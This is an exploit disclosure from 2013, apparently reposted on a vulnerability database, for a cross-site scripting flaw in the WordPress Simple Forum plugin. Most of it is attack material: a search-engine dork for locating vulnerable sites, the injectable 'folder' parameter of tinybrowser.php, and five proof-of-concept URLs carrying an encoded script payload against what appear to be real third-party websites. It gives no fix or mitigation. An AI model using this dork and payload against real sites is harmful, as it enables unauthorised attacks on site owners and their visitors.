Wordpress simple forum Cross site scripting Vulnerability

2013.09.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#******************************************************************************** # Exploit Title : Wordpress simple forum Cross site scripting Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://wordpress.org # # Tested on: Windows 7 , Linux # # Google Dork : inurl:/wp-content/plugins/simple-forum # # Date: 2013/09/23 # -------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=[XSS] # # # Proof: # # http://www.legXs.info/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://wwX.org/home/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://napoXxi.cz/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://mamXournal.ru/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://www.proXic.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php?type=image&folder=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # -------------------------------------------------------------------- ###################### discovered by : ACC3SS ######################


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top